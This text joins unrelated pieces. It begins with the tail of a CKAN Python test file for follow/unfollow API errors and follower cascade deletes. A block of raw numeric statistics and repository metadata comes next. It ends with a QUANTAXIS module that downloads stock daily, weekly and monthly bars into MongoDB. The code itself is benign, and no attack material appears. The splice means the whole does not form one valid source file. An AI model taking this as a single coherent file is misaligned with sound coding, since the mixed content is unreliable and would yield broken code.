        '''Test the error response when a user tries to unfollow a dataset that
        she is not following.
        '''
        error = ckan.tests.call_action_api(self.app, 'unfollow_dataset',
                apikey=self.annafan['apikey'], status=404,
                id=self.annakarenina['id'])
        assert error['message'].startswith('Not found: You are not following')

    def test_01_unfollow_group_not_exists(self):
        '''Test the error response when a user tries to unfollow a group that
        she is not following.
        '''
        error = ckan.tests.call_action_api(self.app, 'unfollow_group',
                apikey=self.annafan['apikey'], status=404,
                id=self.rogers_group['id'])
        assert error['message'].startswith('Not found: You are not following')

    def test_01_unfollow_bad_apikey(self):
        '''Test the error response when a user tries to unfollow something
        but provides a bad API key.
        '''
        for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
            for apikey in ('bad api key', '', ' ', 'None', '3', '35.7',
                    'xxx'):
                error = ckan.tests.call_action_api(self.app, action,
                        apikey=apikey, status=403, id=self.joeadmin['id'])
                assert error['message'] == 'Access denied'

    def test_01_unfollow_missing_apikey(self):
        '''Test error response when calling unfollow_* without api key.'''
        for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
            error = ckan.tests.call_action_api(self.app, action, status=403,
                    id=self.joeadmin['id'])
            assert error['message'] == 'Access denied'

    def test_01_unfollow_bad_object_id(self):
        '''Test error response when calling unfollow_* with bad object id.'''
        for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
            for object_id in ('bad id', ' ', 3, 35.7, 'xxx'):
                error = ckan.tests.call_action_api(self.app, action,
                        apikey=self.annafan['apikey'], status=409,
                        id=object_id)
                assert error['id'][0].startswith('Not found')

    def test_01_unfollow_missing_object_id(self):
        for action in ('unfollow_user', 'unfollow_dataset', 'unfollow_group'):
            # 'missing' means omit the id parameter entirely, as opposed
            # to sending an empty/None value.
            for id in ('missing', None, ''):
                if id == 'missing':
                    error = ckan.tests.call_action_api(self.app, action,
                            apikey=self.annafan['apikey'], status=409)
                else:
                    error = ckan.tests.call_action_api(self.app, action,
                            apikey=self.annafan['apikey'], status=409, id=id)
                assert error['id'] == [u'Missing value']

    def _unfollow_user(self, follower_id, apikey, object_id, object_arg):
        '''Test a user unfollowing a user via the API.

        :param follower_id: id of the follower.
        :param apikey: API key of the follower.
        :param object_id: id of the object to unfollow.
        :param object_arg: the argument to pass to unfollow_user as the id of
            the object to unfollow, could be the object's id or name.
        '''
        # Record the user's number of followers before.
        count_before = ckan.tests.call_action_api(self.app,
                'user_follower_count', id=object_id)
        # Check that the user is following the object.
        am_following = ckan.tests.call_action_api(self.app,
                'am_following_user', apikey=apikey, id=object_id)
        assert am_following is True
        # Make the user unfollow the object.
        ckan.tests.call_action_api(self.app, 'unfollow_user', apikey=apikey,
                id=object_arg)
        # Check that am_following_user now returns False.
        am_following = ckan.tests.call_action_api(self.app,
                'am_following_user', apikey=apikey, id=object_id)
        assert am_following is False
        # Check that the user doesn't appear in the object's list of followers.
        followers = ckan.tests.call_action_api(self.app, 'user_follower_list',
                id=object_id)
        assert len([follower for follower in followers if follower['id'] ==
                follower_id]) == 0
        # Check that the object's follower count has decreased by 1.
        count_after = ckan.tests.call_action_api(self.app,
                'user_follower_count', id=object_id)
        assert count_after == count_before - 1

    def _unfollow_dataset(self, user_id, apikey, dataset_id, dataset_arg):
        '''Test a user unfollowing a dataset via the API.

        :param user_id: id of the follower.
        :param apikey: API key of the follower.
        :param dataset_id: id of the object to unfollow.
        :param dataset_arg: the argument to pass to unfollow_dataset as the id
            of the object to unfollow, could be the object's id or name.
        '''
        # Record the dataset's number of followers before.
        count_before = ckan.tests.call_action_api(self.app,
                'dataset_follower_count', id=dataset_id)
        # Check that the user is following the dataset.
        am_following = ckan.tests.call_action_api(self.app,
                'am_following_dataset', apikey=apikey, id=dataset_id)
        assert am_following is True
        # Make the user unfollow the dataset.
        ckan.tests.call_action_api(self.app, 'unfollow_dataset', apikey=apikey,
                id=dataset_arg)
        # Check that am_following_dataset now returns False.
        am_following = ckan.tests.call_action_api(self.app,
                'am_following_dataset', apikey=apikey, id=dataset_id)
        assert am_following is False
        # Check that the user doesn't appear in the dataset's list of
        # followers.
        followers = ckan.tests.call_action_api(self.app,
                'dataset_follower_list', id=dataset_id)
        assert len([follower for follower in followers if follower['id'] ==
                user_id]) == 0
        # Check that the dataset's follower count has decreased by 1.
        count_after = ckan.tests.call_action_api(self.app,
                'dataset_follower_count', id=dataset_id)
        assert count_after == count_before - 1

    def _unfollow_group(self, user_id, apikey, group_id, group_arg):
        '''Test a user unfollowing a group via the API.

        :param user_id: id of the user
        :param apikey: API key of the user
        :param group_id: id of the group
        :param group_arg: the argument to pass to unfollow_group as the id
            of the group, could be the group's id or name.
        '''
        # Record the group's number of followers before.
        count_before = ckan.tests.call_action_api(self.app,
                'group_follower_count', id=group_id)
        # Check that the user is following the group.
        am_following = ckan.tests.call_action_api(self.app,
                'am_following_group', apikey=apikey, id=group_id)
        assert am_following is True
        # Make the user unfollow the group.
        ckan.tests.call_action_api(self.app, 'unfollow_group', apikey=apikey,
                id=group_arg)
        # Check that am_following_group now returns False.
        am_following = ckan.tests.call_action_api(self.app,
                'am_following_group', apikey=apikey, id=group_id)
        assert am_following is False
        # Check that the user doesn't appear in the group's list of
        # followers.
        followers = ckan.tests.call_action_api(self.app, 'group_follower_list',
                id=group_id)
        assert len([follower for follower in followers if follower['id'] ==
                user_id]) == 0
        # Check that the group's follower count has decreased by 1.
        count_after = ckan.tests.call_action_api(self.app,
                'group_follower_count', id=group_id)
        assert count_after == count_before - 1

    def test_02_follower_delete_by_id(self):
        self._unfollow_user(self.annafan['id'], self.annafan['apikey'],
                self.joeadmin['id'], self.joeadmin['id'])
        self._unfollow_dataset(self.annafan['id'], self.annafan['apikey'],
                self.warandpeace['id'], self.warandpeace['id'])
        self._unfollow_group(self.annafan['id'], self.annafan['apikey'],
                self.davids_group['id'], self.davids_group['id'])
class TestFollowerCascade(object):
    '''Tests for on delete cascade of follower table rows.'''
    @classmethod
    def setup_class(self):
        # Build the standard test fixtures and cache the ids/apikeys/names
        # we need: the model objects themselves are deleted below, so they
        # cannot be read again afterwards.
        ckan.tests.CreateTestData.create()
        self.tester = {
            'id': ckan.model.User.get('tester').id,
            'apikey': ckan.model.User.get('tester').apikey,
            'name': ckan.model.User.get('tester').name,
            }
        self.testsysadmin = {
            'id': ckan.model.User.get('testsysadmin').id,
            'apikey': ckan.model.User.get('testsysadmin').apikey,
            'name': ckan.model.User.get('testsysadmin').name,
            }
        self.annafan = {
            'id': ckan.model.User.get('annafan').id,
            'apikey': ckan.model.User.get('annafan').apikey,
            'name': ckan.model.User.get('annafan').name,
            }
        self.russianfan = {
            'id': ckan.model.User.get('russianfan').id,
            'apikey': ckan.model.User.get('russianfan').apikey,
            'name': ckan.model.User.get('russianfan').name,
            }
        self.joeadmin = {
            'id': ckan.model.User.get('joeadmin').id,
            'apikey': ckan.model.User.get('joeadmin').apikey,
            'name': ckan.model.User.get('joeadmin').name,
            }
        self.warandpeace = {
            'id': ckan.model.Package.get('warandpeace').id,
            'name': ckan.model.Package.get('warandpeace').name,
            }
        self.annakarenina = {
            'id': ckan.model.Package.get('annakarenina').id,
            'name': ckan.model.Package.get('annakarenina').name,
            }
        self.rogers_group = {
            'id': ckan.model.Group.get('roger').id,
            'name': ckan.model.Group.get('roger').name,
            }
        self.davids_group = {
            'id': ckan.model.Group.get('david').id,
            'name': ckan.model.Group.get('david').name,
            }
        self.app = paste.fixture.TestApp(pylons.test.pylonsapp)

        # Create follower relationships that reference the objects about to
        # be deleted, so the on-delete cascade has rows to remove.
        follow_user(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
                self.testsysadmin['id'], self.testsysadmin['id'])
        follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
                self.testsysadmin['id'], self.testsysadmin['id'])
        follow_user(self.app, self.russianfan['id'], self.russianfan['apikey'],
                self.testsysadmin['id'], self.testsysadmin['id'])

        follow_dataset(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
                self.annakarenina['id'], self.annakarenina['id'])
        follow_dataset(self.app, self.annafan['id'], self.annafan['apikey'],
                self.annakarenina['id'], self.annakarenina['id'])
        follow_dataset(self.app, self.russianfan['id'], self.russianfan['apikey'],
                self.annakarenina['id'], self.annakarenina['id'])

        follow_user(self.app, self.tester['id'], self.tester['apikey'],
                self.joeadmin['id'], self.joeadmin['id'])

        follow_dataset(self.app, self.testsysadmin['id'],
                self.testsysadmin['apikey'], self.warandpeace['id'],
                self.warandpeace['id'])

        follow_group(self.app, self.testsysadmin['id'],
                self.testsysadmin['apikey'], self.davids_group['id'],
                self.davids_group['id'])

        # Delete the followed user, dataset and group; their follower rows
        # should cascade away with them.
        session = ckan.model.Session()
        session.delete(ckan.model.User.get('joeadmin'))
        session.commit()

        session.delete(ckan.model.Package.get('warandpeace'))
        session.commit()

        session.delete(ckan.model.Group.get('david'))
        session.commit()

    @classmethod
    def teardown_class(self):
        ckan.model.repo.rebuild_db()

    def test_01_on_delete_cascade_api(self):
        '''
        Test that UserFollowingUser and UserFollowingDataset rows cascade.

        Every follower-related API call against a deleted object should now
        fail with a 409 validation error on the ``id`` field.
        '''
        # It should no longer be possible to get joeadmin's follower list.
        error = ckan.tests.call_action_api(self.app, 'user_follower_list',
                status=409, id='joeadmin')
        assert 'id' in error

        # It should no longer be possible to get warandpeace's follower list.
        error = ckan.tests.call_action_api(self.app, 'dataset_follower_list',
                status=409, id='warandpeace')
        assert 'id' in error

        # It should no longer be possible to get david's follower list.
        error = ckan.tests.call_action_api(self.app, 'group_follower_list',
                status=409, id='david')
        assert 'id' in error

        # It should no longer be possible to get joeadmin's follower count.
        error = ckan.tests.call_action_api(self.app, 'user_follower_count',
                status=409, id='joeadmin')
        assert 'id' in error

        # It should no longer be possible to get warandpeace's follower count.
        error = ckan.tests.call_action_api(self.app, 'dataset_follower_count',
                status=409, id='warandpeace')
        assert 'id' in error

        # It should no longer be possible to get david's follower count.
        error = ckan.tests.call_action_api(self.app, 'group_follower_count',
                status=409, id='david')
        assert 'id' in error

        # It should no longer be possible to get am_following for joeadmin.
        error = ckan.tests.call_action_api(self.app, 'am_following_user',
                apikey=self.testsysadmin['apikey'], status=409, id='joeadmin')
        assert 'id' in error

        # It should no longer be possible to get am_following for warandpeace.
        error = ckan.tests.call_action_api(self.app, 'am_following_dataset',
                apikey=self.testsysadmin['apikey'], status=409,
                id='warandpeace')
        assert 'id' in error

        # It should no longer be possible to get am_following for david.
        error = ckan.tests.call_action_api(self.app, 'am_following_group',
                apikey=self.testsysadmin['apikey'], status=409, id='david')
        assert 'id' in error

        # It should no longer be possible to unfollow joeadmin.
        error = ckan.tests.call_action_api(self.app, 'unfollow_user',
                apikey=self.tester['apikey'], status=409, id='joeadmin')
        assert error['id'] == ['Not found: User']

        # It should no longer be possible to unfollow warandpeace.
        error = ckan.tests.call_action_api(self.app, 'unfollow_dataset',
                apikey=self.testsysadmin['apikey'], status=409,
                id='warandpeace')
        assert error['id'] == ['Not found: Dataset']

        # It should no longer be possible to unfollow david.
        error = ckan.tests.call_action_api(self.app, 'unfollow_group',
                apikey=self.testsysadmin['apikey'], status=409, id='david')
        assert error['id'] == ['Not found: Group']

        # It should no longer be possible to follow joeadmin.
        error = ckan.tests.call_action_api(self.app, 'follow_user',
                apikey=self.annafan['apikey'], status=409, id='joeadmin')
        assert 'id' in error

        # It should no longer be possible to follow warandpeace.
        error = ckan.tests.call_action_api(self.app, 'follow_dataset',
                apikey=self.annafan['apikey'], status=409, id='warandpeace')
        assert 'id' in error

        # It should no longer be possible to follow david.
        error = ckan.tests.call_action_api(self.app, 'follow_group',
                apikey=self.annafan['apikey'], status=409, id='david')
        assert 'id' in error

        # Users who joeadmin was following should no longer have him in their
        # follower list.
        followers = ckan.tests.call_action_api(self.app, 'user_follower_list',
                id=self.testsysadmin['id'])
        assert 'joeadmin' not in [follower['name'] for follower in followers]

        # Datasets who joeadmin was following should no longer have him in
        # their follower list.
        followers = ckan.tests.call_action_api(self.app,
                'dataset_follower_list', id=self.annakarenina['id'])
        assert 'joeadmin' not in [follower['name'] for follower in followers]

    def test_02_on_delete_cascade_db(self):
        if not are_foreign_keys_supported():
            # BUG FIX: the skip message used to say "Search not supported",
            # copy-pasted from an unrelated test.
            raise SkipTest("Foreign keys are not supported")

        # After the previous test above there should be no rows with joeadmin's
        # id in the UserFollowingUser or UserFollowingDataset tables.
        from ckan.model import UserFollowingUser, UserFollowingDataset, UserFollowingGroup
        session = ckan.model.Session()

        query = session.query(UserFollowingUser)
        query = query.filter(UserFollowingUser.follower_id == self.joeadmin['id'])
        assert query.count() == 0

        query = session.query(UserFollowingUser)
        query = query.filter(UserFollowingUser.object_id == self.joeadmin['id'])
        assert query.count() == 0

        # BUG FIX: this query previously filtered on
        # UserFollowingUser.follower_id while querying UserFollowingDataset,
        # which makes SQLAlchemy cross-join the two tables and asserts the
        # wrong thing entirely.
        query = session.query(UserFollowingDataset)
        query = query.filter(
            UserFollowingDataset.follower_id == self.joeadmin['id'])
        assert query.count() == 0

        # There should be no rows with warandpeace's id in the
        # UserFollowingDataset table.
        query = session.query(UserFollowingDataset)
        query = query.filter(
            UserFollowingDataset.object_id == self.warandpeace['id'])
        assert query.count() == 0

        # There should be no rows with david's id in the
        # UserFollowingGroup table.
        query = session.query(UserFollowingGroup)
        query = query.filter(
            UserFollowingGroup.object_id == self.davids_group['id'])
        assert query.count() == 0
| 45.167695
| 90
| 0.624422
| 5,574
| 43,903
| 4.738608
| 0.040545
| 0.024533
| 0.050203
| 0.073373
| 0.918714
| 0.899784
| 0.878166
| 0.85068
| 0.807443
| 0.781963
| 0
| 0.010219
| 0.257773
| 43,903
| 971
| 91
| 45.214212
| 0.800344
| 0.157187
| 0
| 0.701201
| 0
| 0
| 0.133821
| 0.010629
| 0
| 0
| 0
| 0
| 0.157658
| 1
| 0.09009
| false
| 0
| 0.010511
| 0
| 0.106607
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90ed2cb3a84f0857b48f6aac44b96a5b9ab712e1
| 173,547
|
py
|
Python
|
QUANTAXIS/QASU/save_tdx.py
|
yehonghao/QUANTAXIS
|
d977810233607e2bea016450bef6bb080582b498
|
[
"MIT"
] | 1
|
2021-02-19T07:49:31.000Z
|
2021-02-19T07:49:31.000Z
|
QUANTAXIS/QASU/save_tdx.py
|
yehonghao/QUANTAXIS
|
d977810233607e2bea016450bef6bb080582b498
|
[
"MIT"
] | null | null | null |
QUANTAXIS/QASU/save_tdx.py
|
yehonghao/QUANTAXIS
|
d977810233607e2bea016450bef6bb080582b498
|
[
"MIT"
] | 1
|
2021-02-19T07:49:38.000Z
|
2021-02-19T07:49:38.000Z
|
# coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2019 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import concurrent
import datetime
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor
import json
import pandas as pd
import pymongo
from QUANTAXIS.QAFetch import QA_fetch_get_stock_block
from QUANTAXIS.QAFetch.QATdx import (
QA_fetch_get_option_day,
QA_fetch_get_option_min,
QA_fetch_get_index_day,
QA_fetch_get_index_min,
QA_fetch_get_stock_day,
QA_fetch_get_stock_info,
QA_fetch_get_stock_list,
QA_fetch_get_future_list,
QA_fetch_get_index_list,
QA_fetch_get_future_day,
QA_fetch_get_future_min,
QA_fetch_get_stock_min,
QA_fetch_get_stock_transaction,
QA_fetch_get_stock_xdxr,
select_best_ip
)
from QUANTAXIS.QAFetch.QATdx import (
QA_fetch_get_commodity_option_CU_contract_time_to_market,
QA_fetch_get_commodity_option_SR_contract_time_to_market,
QA_fetch_get_commodity_option_M_contract_time_to_market,
QA_fetch_get_commodity_option_RU_contract_time_to_market,
QA_fetch_get_commodity_option_CF_contract_time_to_market,
QA_fetch_get_commodity_option_C_contract_time_to_market,
QA_fetch_get_option_50etf_contract_time_to_market,
QA_fetch_get_option_all_contract_time_to_market,
)
from QUANTAXIS.QAUtil import (
DATABASE,
QA_util_get_next_day,
QA_util_get_real_date,
QA_util_log_info,
QA_util_to_json_from_pandas,
trade_date_sse
)
from QUANTAXIS.QAUtil import Parallelism
from QUANTAXIS.QAFetch.QATdx import ping, get_ip_list_by_multi_process_ping, stock_ip_list
from multiprocessing import cpu_count
# ip=select_best_ip()
def now_time():
    """Return the cut-off datetime string used as the download end point.

    Before 15:00 local time the latest complete session is the previous
    trading day, so the cut-off is that day at 17:00:00; from 15:00 onward
    today's session has closed and the cut-off is the latest trading day
    (up to today) at 15:00:00.
    """
    if datetime.datetime.now().hour < 15:
        anchor = datetime.date.today() - datetime.timedelta(days=1)
        trading_day = QA_util_get_real_date(str(anchor), trade_date_sse, -1)
        return str(trading_day) + ' 17:00:00'
    trading_day = QA_util_get_real_date(
        str(datetime.date.today()), trade_date_sse, -1)
    return str(trading_day) + ' 15:00:00'
def QA_SU_save_single_stock_day(code : str, client= DATABASE, ui_log=None):
    '''
    save single stock_day
    保存单个股票日线数据 (save the daily bars for one stock code)

    :param code: 要保存数据的股票代码 (stock code to save)
    :param client: pymongo client/database wrapper (defaults to DATABASE)
    :param ui_log: 给GUI qt 界面使用 (log sink for the Qt GUI, may be None)
    '''
    #stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll_stock_day = client.stock_day
    # Compound (code, date_stamp) index keeps the incremental lookups fast.
    coll_stock_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll_stock_day):
        # Incrementally save one code: resume from the last stored date if
        # the collection already has rows for it, otherwise do a full
        # download starting at 1990-01-01.
        try:
            QA_util_log_info(
                '##JOB01 Now Saving STOCK_DAY==== {}'.format(str(code)),
                ui_log
            )

            # 首选查找数据库 是否 有 这个代码的数据
            ref = coll_stock_day.find({'code': str(code)[0:6]})
            end_date = str(now_time())[0:10]

            # 当前数据库已经包含了这个代码的数据, 继续增量更新
            # 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
            # (guard against negative indexing when the code has no rows yet,
            # e.g. a freshly listed stock)
            if ref.count() > 0:

                # 接着上次获取的日期继续更新 (resume from the last stored date)
                start_date = ref[ref.count() - 1]['date']

                QA_util_log_info(
                    'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log
                )
                if start_date != end_date:
                    coll_stock_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                QA_util_get_next_day(start_date),
                                end_date,
                                '00'
                            )
                        )
                    )

            # 当前数据库中没有这个代码的股票数据, 从1990-01-01 开始下载所有的数据
            else:
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log
                )
                if start_date != end_date:
                    coll_stock_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                start_date,
                                end_date,
                                '00'
                            )
                        )
                    )
        except Exception as error0:
            # NOTE(review): failures are printed (not sent to ui_log) and the
            # code is recorded; the summary below reports it.
            print(error0)
            err.append(str(code))

    __saving_work(code, coll_stock_day)

    if len(err) < 1:
        QA_util_log_info('SUCCESS save stock day ^_^', ui_log)
    else:
        QA_util_log_info('ERROR CODE \n ', ui_log)
        QA_util_log_info(err, ui_log)
def QA_SU_save_stock_day(client=DATABASE, ui_log=None, ui_progress=None):
    '''
    save stock_day
    保存日线数据 (save daily bars for every listed stock)

    :param client: pymongo client/database wrapper (defaults to DATABASE)
    :param ui_log: 给GUI qt 界面使用 (log sink for the Qt GUI)
    :param ui_progress: 给GUI qt 界面使用 (progress sink for the Qt GUI)
    '''
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll_stock_day = client.stock_day
    # Compound (code, date_stamp) index keeps the incremental lookups fast.
    coll_stock_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll_stock_day):
        # Incrementally save one code: resume from the last stored date if
        # rows exist, otherwise do a full download starting at 1990-01-01.
        try:
            QA_util_log_info(
                '##JOB01 Now Saving STOCK_DAY==== {}'.format(str(code)),
                ui_log
            )

            # 首选查找数据库 是否 有 这个代码的数据
            ref = coll_stock_day.find({'code': str(code)[0:6]})
            end_date = str(now_time())[0:10]

            # 当前数据库已经包含了这个代码的数据, 继续增量更新
            # 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
            if ref.count() > 0:

                # 接着上次获取的日期继续更新
                start_date = ref[ref.count() - 1]['date']

                QA_util_log_info(
                    'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log
                )
                if start_date != end_date:
                    coll_stock_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                QA_util_get_next_day(start_date),
                                end_date,
                                '00'
                            )
                        )
                    )

            # 当前数据库中没有这个代码的股票数据, 从1990-01-01 开始下载所有的数据
            else:
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_STOCK_DAY \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log
                )
                if start_date != end_date:
                    coll_stock_day.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                start_date,
                                end_date,
                                '00'
                            )
                        )
                    )
        except Exception as error0:
            print(error0)
            err.append(str(code))

    for item in range(len(stock_list)):
        QA_util_log_info('The {} of Total {}'.format(item, len(stock_list)))

        # BUG FIX: ui_log used to be interpolated into the progress message
        # itself ('DOWNLOAD PROGRESS {} {}'.format(pct, ui_log)); the text
        # should only carry the percentage, like every sibling saver here.
        strProgressToLog = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(stock_list) * 100))[0:4] + '%'
        )
        intProgressToLog = int(float(item / len(stock_list) * 100))
        QA_util_log_info(
            strProgressToLog,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgressToLog
        )

        __saving_work(stock_list[item], coll_stock_day)

    if len(err) < 1:
        QA_util_log_info('SUCCESS save stock day ^_^', ui_log)
    else:
        QA_util_log_info('ERROR CODE \n ', ui_log)
        QA_util_log_info(err, ui_log)
def gen_param(codelist, start_date=None, end_date=None, if_fq='00', frequence='day', IPList=[]):
# 生成QA.QAFetch.QATdx.QQA_fetch_get_stock_day多进程处理的参数
count = len(IPList)
my_iterator = iter(range(len(codelist)))
start_date = str(start_date)[0:10]
end_date = str(end_date)[0:10]
return [(code, start_date, end_date, if_fq, frequence, IPList[i % count]['ip'], IPList[i % count]['port'])
for code, i in [(code, next(my_iterator) % count) for code in codelist]]
def QA_SU_save_stock_week(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_week
    保存周线数据 (save weekly bars for every listed stock)

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll_stock_week = client.stock_week
    # Compound (code, date_stamp) index keeps the incremental lookups fast.
    coll_stock_week.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll_stock_week):
        # Incrementally save one code: resume from the last stored date if
        # rows exist, otherwise download everything from 1990-01-01.
        try:
            QA_util_log_info(
                '##JOB01 Now Saving STOCK_WEEK==== {}'.format(str(code)),
                ui_log=ui_log
            )

            ref = coll_stock_week.find({'code': str(code)[0:6]})
            end_date = str(now_time())[0:10]
            if ref.count() > 0:
                # 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
                start_date = ref[ref.count() - 1]['date']

                QA_util_log_info(
                    'UPDATE_STOCK_WEEK \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_stock_week.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                QA_util_get_next_day(start_date),
                                end_date,
                                '00',
                                frequence='week'
                            )
                        )
                    )
            else:
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_STOCK_WEEK \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_stock_week.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                start_date,
                                end_date,
                                '00',
                                frequence='week'
                            )
                        )
                    )
        # BUG FIX: was a bare `except:`, which also swallows
        # KeyboardInterrupt/SystemExit; catch Exception instead.
        except Exception:
            err.append(str(code))

    for item in range(len(stock_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(stock_list)),
            ui_log=ui_log
        )
        strProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(stock_list) * 100))[0:4] + '%'
        )
        intProgress = int(float(item / len(stock_list) * 100))
        QA_util_log_info(
            strProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgress
        )
        __saving_work(stock_list[item], coll_stock_week)

    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_month(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_month
    保存月线数据 (save monthly bars for every listed stock)

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll_stock_month = client.stock_month
    # Compound (code, date_stamp) index keeps the incremental lookups fast.
    coll_stock_month.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll_stock_month):
        # Incrementally save one code: resume from the last stored date if
        # rows exist, otherwise download everything from 1990-01-01.
        try:
            QA_util_log_info(
                '##JOB01 Now Saving STOCK_MONTH==== {}'.format(str(code)),
                ui_log=ui_log
            )

            ref = coll_stock_month.find({'code': str(code)[0:6]})
            end_date = str(now_time())[0:10]
            if ref.count() > 0:
                # 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
                start_date = ref[ref.count() - 1]['date']

                QA_util_log_info(
                    'UPDATE_STOCK_MONTH \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_stock_month.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                QA_util_get_next_day(start_date),
                                end_date,
                                '00',
                                frequence='month'
                            )
                        )
                    )
            else:
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_STOCK_MONTH \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_stock_month.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                start_date,
                                end_date,
                                '00',
                                frequence='month'
                            )
                        )
                    )
        # BUG FIX: was a bare `except:`, which also swallows
        # KeyboardInterrupt/SystemExit; catch Exception instead.
        except Exception:
            err.append(str(code))

    for item in range(len(stock_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(stock_list)),
            ui_log=ui_log
        )
        strProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(stock_list) * 100))[0:4] + '%'
        )
        intProgress = int(float(item / len(stock_list) * 100))
        QA_util_log_info(
            strProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgress
        )
        __saving_work(stock_list[item], coll_stock_month)

    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info('ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
